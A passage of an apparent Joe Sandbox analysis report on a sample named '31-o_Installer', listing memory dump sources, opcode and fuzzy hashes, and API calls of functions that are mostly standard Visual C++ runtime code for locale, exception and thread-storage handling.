                • Opcode ID: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                • Instruction ID: 750e1792565ec23c45c904713fa6c892cda33c55f17cc1d1acea19c2b18565d9
                • Opcode Fuzzy Hash: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                • Instruction Fuzzy Hash: A3C1A473D2A5F3858B36892E049823FEE626E81B8431FC395DCD83F589C2376D2995D0
                Memory Dump Source
                • Source File: 00000000.00000002.4545209506.0000000000261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                • Associated: 00000000.00000002.4545175201.0000000000260000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4545345196.0000000000279000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4545382115.000000000027F000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4545419954.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_260000_31-o_Installer.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                • Instruction ID: d2f6e4be5aca2c29cd0f915208d5f44041dcf34ae199e71851586fac6451c023
                • Opcode Fuzzy Hash: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                • Instruction Fuzzy Hash: 49C19073D2A5F3C58B358A2D049863BEA626E81B9431FC391DCD83F189C2376D2996D0
                Memory Dump Source
                • Source File: 00000000.00000002.4545209506.0000000000261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                • Associated: 00000000.00000002.4545175201.0000000000260000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4545345196.0000000000279000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4545382115.000000000027F000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4545419954.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_260000_31-o_Installer.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                • Instruction ID: ce7344e45790d656b7895ae2cff34a6f6283061c54470a445114be16931c4b75
                • Opcode Fuzzy Hash: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                • Instruction Fuzzy Hash: 30C18173D2A5F3898B36892D04A823FEE616E81B9431FC391DCD83F589C2376D2995D0
                Memory Dump Source
                • Source File: 00000000.00000002.4545209506.0000000000261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                • Associated: 00000000.00000002.4545175201.0000000000260000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4545345196.0000000000279000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4545382115.000000000027F000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4545419954.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_260000_31-o_Installer.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 21b74c51e355f1ada917146b454bba93dbff062365e48e41ecc74cc68dac6f4d
                • Instruction ID: 6b6bd321e97e105657d1f98193899bde3051c75489003917bfbc4a410294917a
                • Opcode Fuzzy Hash: 21b74c51e355f1ada917146b454bba93dbff062365e48e41ecc74cc68dac6f4d
                • Instruction Fuzzy Hash: DFB19233D2A5F3868B35892D049823FEE626E81B8431BC3D1DCD83F589C6376D2995D0
                Memory Dump Source
                • Source File: 00000000.00000002.4548564340.0000000005330000.00000040.00000800.00020000.00000000.sdmp, Offset: 05330000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_5330000_31-o_Installer.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 1d852ec7ca4fde7e7a391660c85568e4df8c39d23f7a913afd13cebeca19eacd
                • Instruction ID: 3bfc0796aad08dd7b83f867319e80faec97e53415cbbc71e5031055602512d62
                • Opcode Fuzzy Hash: 1d852ec7ca4fde7e7a391660c85568e4df8c39d23f7a913afd13cebeca19eacd
                • Instruction Fuzzy Hash: 0E819134F052198BDB1DEFB5945967FBBB7BFC8B90B04886DD446E7284CE3498018B91
                Memory Dump Source
                • Source File: 00000000.00000002.4548564340.0000000005330000.00000040.00000800.00020000.00000000.sdmp, Offset: 05330000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_5330000_31-o_Installer.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 6db7703d7db76b29c5aae2e9059684d0eb870cd9f5fb8e1393b962108f36c909
                • Instruction ID: 6953333dbfb3b66ac9ca6cb97f44447c5b524b316a8be95e87a3cc81520342cf
                • Opcode Fuzzy Hash: 6db7703d7db76b29c5aae2e9059684d0eb870cd9f5fb8e1393b962108f36c909
                • Instruction Fuzzy Hash: 63915B70E003499FDF10CFA9C99A7ADBBF2BF88314F148129E415A72A4EB749845CF91
                Memory Dump Source
                • Source File: 00000000.00000002.4546753874.0000000002E60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2e60000_31-o_Installer.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 54093e43b9854a2d540d9dde3269946287902615532eb97d05431949d4969fe2
                • Instruction ID: c6f7cd3ac6d1c4042dc55b11199854032cdcf33777ef53288f2b2425b83851a2
                • Opcode Fuzzy Hash: 54093e43b9854a2d540d9dde3269946287902615532eb97d05431949d4969fe2
                • Instruction Fuzzy Hash: 70F06D32250205AFCF158F88CC41EAA77E9EF08264B088069FD09DB221E331FD209B80
                Memory Dump Source
                • Source File: 00000000.00000002.4545209506.0000000000261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                • Associated: 00000000.00000002.4545175201.0000000000260000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4545345196.0000000000279000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4545382115.000000000027F000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4545419954.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_260000_31-o_Installer.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: e9b762c1d9091a2c99a71b58989111832db4a596a20ce5d8aa31cc9ae1b6fce7
                • Instruction ID: b7981b2b79c9869a23804c67e8d6833124cc0914444bbad9644d1b21342d72dc
                • Opcode Fuzzy Hash: e9b762c1d9091a2c99a71b58989111832db4a596a20ce5d8aa31cc9ae1b6fce7
                • Instruction Fuzzy Hash: 71C012B1C04318AB8F04EFED544109DBBF8AA04200B40C5AA9405B2242D27052104644
                APIs
                • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,00265A5E), ref: 002698ED
                • __mtterm.LIBCMT ref: 002698F9
                  • Part of subcall function 00269632: DecodePointer.KERNEL32(00000002,00269A5B,?,00265A5E), ref: 00269643
                  • Part of subcall function 00269632: TlsFree.KERNEL32(00000002,00269A5B,?,00265A5E), ref: 0026965D
                  • Part of subcall function 00269632: DeleteCriticalSection.KERNEL32(00000000,00000000,77375810,?,00269A5B,?,00265A5E), ref: 0026B6A4
                  • Part of subcall function 00269632: _free.LIBCMT ref: 0026B6A7
                  • Part of subcall function 00269632: DeleteCriticalSection.KERNEL32(00000002,77375810,?,00269A5B,?,00265A5E), ref: 0026B6CE
                • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 0026990F
                • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 0026991C
                • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00269929
                • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00269936
                • TlsAlloc.KERNEL32(?,00265A5E), ref: 00269986
                • TlsSetValue.KERNEL32(00000000,?,00265A5E), ref: 002699A1
                • __init_pointers.LIBCMT ref: 002699AB
                • EncodePointer.KERNEL32(?,00265A5E), ref: 002699BC
                • EncodePointer.KERNEL32(?,00265A5E), ref: 002699C9
                • EncodePointer.KERNEL32(?,00265A5E), ref: 002699D6
                • EncodePointer.KERNEL32(?,00265A5E), ref: 002699E3
                • DecodePointer.KERNEL32(002697B6,?,00265A5E), ref: 00269A04
                • __calloc_crt.LIBCMT ref: 00269A19
                • DecodePointer.KERNEL32(00000000,?,00265A5E), ref: 00269A33
                • GetCurrentThreadId.KERNEL32 ref: 00269A45
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.4545209506.0000000000261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                • Associated: 00000000.00000002.4545175201.0000000000260000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4545345196.0000000000279000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4545382115.000000000027F000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4545419954.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_260000_31-o_Installer.jbxd
                Similarity
                • API ID: Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                • API String ID: 3698121176-3819984048
                • Opcode ID: b4df4ab2a0de6958bc08a55cc21936d1a53e86fe833360a45f1043661b74349e
                • Instruction ID: 7d3fe0dfc8e50d592f3271d5a49a1fc2d8f1526753ead27f898633f8888918c6
                • Opcode Fuzzy Hash: b4df4ab2a0de6958bc08a55cc21936d1a53e86fe833360a45f1043661b74349e
                • Instruction Fuzzy Hash: 4231A4759233119EE7619F75BD4E61D3BE8EB81B60B10051BE418D22B1DBB098D5CF40
                APIs
                • __EH_prolog.LIBCMT ref: 00262364
                • std::_Lockit::_Lockit.LIBCPMT ref: 00262373
                • int.LIBCPMT ref: 0026238A
                  • Part of subcall function 00261035: std::_Lockit::_Lockit.LIBCPMT ref: 00261046
                • std::bad_exception::bad_exception.LIBCMT ref: 002623C1
                • __CxxThrowException@8.LIBCMT ref: 002623CF
                • std::locale::facet::_Incref.LIBCPMT ref: 002623DF
                • std::locale::facet::_Facet_Register.LIBCPMT ref: 002623E5
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.4545209506.0000000000261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                • Associated: 00000000.00000002.4545175201.0000000000260000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4545345196.0000000000279000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4545382115.000000000027F000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4545419954.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_260000_31-o_Installer.jbxd
                Similarity
                • API ID: LockitLockit::_std::_std::locale::facet::_$Exception@8Facet_H_prologIncrefRegisterThrowstd::bad_exception::bad_exception
                • String ID: bad cast
                • API String ID: 878426289-3145022300
                • Opcode ID: b0d0529235a25301eba8a9bed101988e347c04cd71db947ccf58f8043c7206c1
                • Instruction ID: 3b55559de926d67287b1bcb0b79c9b2bd5253754bbe0adee2f4f75a9aceaea2a
                • Opcode Fuzzy Hash: b0d0529235a25301eba8a9bed101988e347c04cd71db947ccf58f8043c7206c1
                • Instruction Fuzzy Hash: DA11A03692061597CF05FB60DC42AAEB335AF81720F240159F411672D1DF749AF88B90
                APIs
                • __EH_prolog.LIBCMT ref: 00261E33
                • std::_Lockit::_Lockit.LIBCPMT ref: 00261E42
                • int.LIBCPMT ref: 00261E59
                  • Part of subcall function 00261035: std::_Lockit::_Lockit.LIBCPMT ref: 00261046
                • std::bad_exception::bad_exception.LIBCMT ref: 00261E90
                • __CxxThrowException@8.LIBCMT ref: 00261E9E
                • std::locale::facet::_Incref.LIBCPMT ref: 00261EAE
                • std::locale::facet::_Facet_Register.LIBCPMT ref: 00261EB4
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.4545209506.0000000000261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                • Associated: 00000000.00000002.4545175201.0000000000260000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4545345196.0000000000279000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4545382115.000000000027F000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4545419954.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_260000_31-o_Installer.jbxd
                Similarity
                • API ID: LockitLockit::_std::_std::locale::facet::_$Exception@8Facet_H_prologIncrefRegisterThrowstd::bad_exception::bad_exception
                • String ID: bad cast
                • API String ID: 878426289-3145022300
                • Opcode ID: be279956c5939c0520dcfc65789946670b40524159d4976e71c231824ddf9d7f
                • Instruction ID: b98167be6c8e2a073deee81bb01d5d71b947045e5fc546344830333a34cfc096
                • Opcode Fuzzy Hash: be279956c5939c0520dcfc65789946670b40524159d4976e71c231824ddf9d7f
                • Instruction Fuzzy Hash: 7811E536921115ABCF05FB60DD42AAEB375AF91721F280159F811672D1DF30EAB4CF90
                APIs
                • __getptd_noexit.LIBCMT ref: 0026741A
                  • Part of subcall function 00269723: GetLastError.KERNEL32(?,?,0026A964,00264478,?,?,00263C7B,?,?,0026101C), ref: 00269727
                  • Part of subcall function 00269723: ___set_flsgetvalue.LIBCMT ref: 00269735
                  • Part of subcall function 00269723: __calloc_crt.LIBCMT ref: 00269749
                  • Part of subcall function 00269723: DecodePointer.KERNEL32(00000000,?,?,0026A964,00264478,?,?,00263C7B,?,?,0026101C), ref: 00269763
                  • Part of subcall function 00269723: GetCurrentThreadId.KERNEL32 ref: 00269779
                  • Part of subcall function 00269723: SetLastError.KERNEL32(00000000,?,?,0026A964,00264478,?,?,00263C7B,?,?,0026101C), ref: 00269791
                • __calloc_crt.LIBCMT ref: 0026743C
                • __get_sys_err_msg.LIBCMT ref: 0026745A
                • _strcpy_s.LIBCMT ref: 00267462
                • __invoke_watson.LIBCMT ref: 00267477
                Strings
                • Visual C++ CRT: Not enough memory to complete call to strerror., xrefs: 00267427, 0026744A
                Memory Dump Source
                • Source File: 00000000.00000002.4545209506.0000000000261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                • Associated: 00000000.00000002.4545175201.0000000000260000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4545345196.0000000000279000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4545382115.000000000027F000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4545419954.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_260000_31-o_Installer.jbxd
                Similarity
                • API ID: ErrorLast__calloc_crt$CurrentDecodePointerThread___set_flsgetvalue__get_sys_err_msg__getptd_noexit__invoke_watson_strcpy_s
                • String ID: Visual C++ CRT: Not enough memory to complete call to strerror.
                • API String ID: 3117964792-798102604
                • Opcode ID: 3a8dbc98b16cea2ecd2520fa6bbb9756d9053dbece81c19f27155875d3ce9ba9
                • Instruction ID: b7e1997c9af375e30a41b6391bef6497d288f1511adcc45842264e40e01a2f1a
                • Opcode Fuzzy Hash: 3a8dbc98b16cea2ecd2520fa6bbb9756d9053dbece81c19f27155875d3ce9ba9
                • Instruction Fuzzy Hash: 80F02B7253C21027A7203D297CC996B76BCDB41B5CF144479F64997602ED719CF04695
                APIs
                • __EH_prolog.LIBCMT ref: 00261A86
                • std::_Lockit::_Lockit.LIBCPMT ref: 00261A98
                • std::exception::exception.LIBCMT ref: 00261ACF
                  • Part of subcall function 00263C86: std::exception::_Copy_str.LIBCMT ref: 00263CA1
                • __CxxThrowException@8.LIBCMT ref: 00261AE4
                  • Part of subcall function 0026450C: RaiseException.KERNEL32(?,?,002613AC,?,?,?,?,?,002613AC,?,0027CCE8,00000000), ref: 0026454E
                • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00261AED
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.4545209506.0000000000261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                • Associated: 00000000.00000002.4545175201.0000000000260000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4545345196.0000000000279000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4545382115.000000000027F000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4545419954.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_260000_31-o_Installer.jbxd
                Similarity
                • API ID: std::_$Copy_strExceptionException@8H_prologLocinfo::_Locinfo_ctorLockitLockit::_RaiseThrowstd::exception::_std::exception::exception
                • String ID: bad locale name
                • API String ID: 446407826-1405518554
                • Opcode ID: ae4d28cb46da46f5f95ccda3bebacd53e9c10cb44eba64886f032f051ce05c4f
                • Instruction ID: c61889757b37d537d81c08a5426283e5905b352ca48d7e9b874d6495a8553497
                • Opcode Fuzzy Hash: ae4d28cb46da46f5f95ccda3bebacd53e9c10cb44eba64886f032f051ce05c4f
                • Instruction Fuzzy Hash: 71016DB2815744AECB21EFA9C4805CEFFB4BB19300B90C56FE59993601C7709768CFA5
                APIs
                • GetModuleHandleW.KERNEL32(KERNEL32.DLL,0027D638,00000008,00269777,00000000,00000000,?,?,0026A964,00264478,?,?,00263C7B,?,?,0026101C), ref: 00269680
                • __lock.LIBCMT ref: 002696B4
                  • Part of subcall function 0026B7B7: __mtinitlocknum.LIBCMT ref: 0026B7CD
                  • Part of subcall function 0026B7B7: __amsg_exit.LIBCMT ref: 0026B7D9
                  • Part of subcall function 0026B7B7: EnterCriticalSection.KERNEL32(00000000,00000000,?,002696B9,0000000D), ref: 0026B7E1
                • InterlockedIncrement.KERNEL32(?), ref: 002696C1
                • __lock.LIBCMT ref: 002696D5
                • ___addlocaleref.LIBCMT ref: 002696F3
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.4545209506.0000000000261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                • Associated: 00000000.00000002.4545175201.0000000000260000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4545345196.0000000000279000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4545382115.000000000027F000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4545419954.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_260000_31-o_Installer.jbxd
                Similarity
                • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                • String ID: KERNEL32.DLL
                • API String ID: 637971194-2576044830
                • Opcode ID: b2e92e631d6904f97edaf7f128e37eae6e2b3bb4f41b8fffd5f4d705bf5f853c
                • Instruction ID: f043bfc2984cd8b78f585b6abccd1807113aa09ba0b644671c7a12e50e39805b
                • Opcode Fuzzy Hash: b2e92e631d6904f97edaf7f128e37eae6e2b3bb4f41b8fffd5f4d705bf5f853c
                • Instruction Fuzzy Hash: 58016D71825B009FD7219F75D84A74AFBF4AF50324F20890DE89A962A1CBB4A5D4CF15
                APIs
                • __getptd.LIBCMT ref: 002676F1
                  • Part of subcall function 0026979C: __getptd_noexit.LIBCMT ref: 0026979F
                  • Part of subcall function 0026979C: __amsg_exit.LIBCMT ref: 002697AC
                • __getptd.LIBCMT ref: 00267702
                • __getptd.LIBCMT ref: 00267710
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.4545209506.0000000000261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                • Associated: 00000000.00000002.4545175201.0000000000260000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4545345196.0000000000279000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4545382115.000000000027F000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4545419954.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_260000_31-o_Installer.jbxd
                Similarity
                • API ID: __getptd$__amsg_exit__getptd_noexit
                • String ID: MOC$RCC$csm
                • API String ID: 803148776-2671469338
                • Opcode ID: 1fefd8f84a83a40e8ccdaf602bb71a21e828e3d03397e904957b1e236622b6d8
                • Instruction ID: 363004e4b9605cf11c5dc1e9bd8c13fff0f4d9e188a305b4cabffbb6df36fc51
                • Opcode Fuzzy Hash: 1fefd8f84a83a40e8ccdaf602bb71a21e828e3d03397e904957b1e236622b6d8
                • Instruction Fuzzy Hash: 7AE092751341058FDF229F68D04AB69B794FB48319F5E54A1E40DCB222CB74E9F09A92
                APIs
                • __CreateFrameInfo.LIBCMT ref: 002679BB
                  • Part of subcall function 00264842: __getptd.LIBCMT ref: 00264850
                  • Part of subcall function 00264842: __getptd.LIBCMT ref: 0026485E
                • __getptd.LIBCMT ref: 002679C5
                  • Part of subcall function 0026979C: __getptd_noexit.LIBCMT ref: 0026979F
                  • Part of subcall function 0026979C: __amsg_exit.LIBCMT ref: 002697AC
                • __getptd.LIBCMT ref: 002679D3
                • __getptd.LIBCMT ref: 002679E1
                • __getptd.LIBCMT ref: 002679EC
                • _CallCatchBlock2.LIBCMT ref: 00267A12
                  • Part of subcall function 002648E7: __CallSettingFrame@12.LIBCMT ref: 00264933
                  • Part of subcall function 00267AB9: __getptd.LIBCMT ref: 00267AC8
                  • Part of subcall function 00267AB9: __getptd.LIBCMT ref: 00267AD6
                Memory Dump Source
                • Source File: 00000000.00000002.4545209506.0000000000261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                • Associated: 00000000.00000002.4545175201.0000000000260000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4545345196.0000000000279000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4545382115.000000000027F000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4545419954.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_260000_31-o_Installer.jbxd
                Similarity
                • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                • String ID:
                • API String ID: 1602911419-0
                • Opcode ID: eeab85b677f4f54c23aa05237dcc4011d470620a882085f63ed2e8d5c1f2aee8
                • Instruction ID: f5e2bcccdfd96dc6357314a7da2a8af046eeeba08e1d6f64ec1c9293a4723f40
                • Opcode Fuzzy Hash: eeab85b677f4f54c23aa05237dcc4011d470620a882085f63ed2e8d5c1f2aee8
                • Instruction Fuzzy Hash: EE112BB5C20209DFDF00EFA4D845AEDBBB0FF08315F148469F854A7252DB389AA19F54
                APIs
                • __getptd.LIBCMT ref: 0026D230
                  • Part of subcall function 0026979C: __getptd_noexit.LIBCMT ref: 0026979F
                  • Part of subcall function 0026979C: __amsg_exit.LIBCMT ref: 002697AC
                • __amsg_exit.LIBCMT ref: 0026D250
                • __lock.LIBCMT ref: 0026D260
                • InterlockedDecrement.KERNEL32(?), ref: 0026D27D
                • _free.LIBCMT ref: 0026D290
                • InterlockedIncrement.KERNEL32(00B31688), ref: 0026D2A8
                Memory Dump Source
                • Source File: 00000000.00000002.4545209506.0000000000261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                • Associated: 00000000.00000002.4545175201.0000000000260000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4545345196.0000000000279000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4545382115.000000000027F000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4545419954.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_260000_31-o_Installer.jbxd
                Similarity
                • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                • String ID:
                • API String ID: 3470314060-0
                • Opcode ID: 06e1c9fcdd4201148d97f51f9e0f02b99f988fa2c7cd05f52819f99b201ed59b
                • Instruction ID: a4d333c6183073993b7b89cc2cecbb20c6f4149bcf31b267ec3ca501c4014681
                • Opcode Fuzzy Hash: 06e1c9fcdd4201148d97f51f9e0f02b99f988fa2c7cd05f52819f99b201ed59b
                • Instruction Fuzzy Hash: E101F933E217169BCB61AF259859B4DB3A0BF00721F044019EC08A7292CB70DDE1CFD1
                APIs
                • __EH_prolog.LIBCMT ref: 00261B0B
                • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00261B1F
                  • Part of subcall function 002632F5: _setlocale.LIBCMT ref: 00263307
                • _free.LIBCMT ref: 00261B2D
                  • Part of subcall function 00264452: HeapFree.KERNEL32(00000000,00000000,?,00263C7B,?,?,0026101C), ref: 00264468
                  • Part of subcall function 00264452: GetLastError.KERNEL32(?,?,00263C7B,?,?,0026101C), ref: 0026447A
                • _free.LIBCMT ref: 00261B3F
                • _free.LIBCMT ref: 00261B51
                • _free.LIBCMT ref: 00261B63
                Memory Dump Source
                • Source File: 00000000.00000002.4545209506.0000000000261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                • Associated: 00000000.00000002.4545175201.0000000000260000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4545345196.0000000000279000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4545382115.000000000027F000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4545419954.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_260000_31-o_Installer.jbxd
                Similarity
                • API ID: _free$ErrorFreeH_prologHeapLastLocinfo::_Locinfo_dtor_setlocalestd::_
                • String ID:
                • API String ID: 770894815-0
                • Opcode ID: bf61b38823c23622de6db5f19a5022e0785a9c7ff495307da554c38b7b7a07c9
                • Instruction ID: e3669833a52b6d17e55f2863511a86795842e18fa6320db1b107fcb7b215d293
                • Opcode Fuzzy Hash: bf61b38823c23622de6db5f19a5022e0785a9c7ff495307da554c38b7b7a07c9
                • Instruction Fuzzy Hash: FC015E316207019BDB28EF68D406B9BB3E8BF01725F14C51EE055D7581DF78E9648E60
                APIs
                • __CxxThrowException@8.LIBCMT ref: 0026155A
                • std::exception::exception.LIBCMT ref: 0026157C
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.4545209506.0000000000261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                • Associated: 00000000.00000002.4545175201.0000000000260000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4545345196.0000000000279000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4545382115.000000000027F000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4545419954.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_260000_31-o_Installer.jbxd
                Similarity
                • API ID: Exception@8Throwstd::exception::exception
                • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                • API String ID: 3728558374-1866435925
                • Opcode ID: 5fad501d381663661ec5a3d9eb7020eead4e1063b3a26191efab151086124973
                • Instruction ID: ec469edb0af9dadcb2cfd6568f57d5e5c5c7d987aeb876f9269ec7182acf41df
                • Opcode Fuzzy Hash: 5fad501d381663661ec5a3d9eb7020eead4e1063b3a26191efab151086124973
                • Instruction Fuzzy Hash: 5A0175F1830349AFCB10EF68C4066ADB7E45F84714FA8C119A9179B142DA74EBB5CF51
                APIs
                • ___BuildCatchObject.LIBCMT ref: 00267D53
                  • Part of subcall function 00267CAE: ___BuildCatchObjectHelper.LIBCMT ref: 00267CE4
                • _UnwindNestedFrames.LIBCMT ref: 00267D6A
                • ___FrameUnwindToState.LIBCMT ref: 00267D78
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.4545209506.0000000000261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                • Associated: 00000000.00000002.4545175201.0000000000260000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4545345196.0000000000279000.00000002.00000001.01000000.00000003.sdmpDownload File
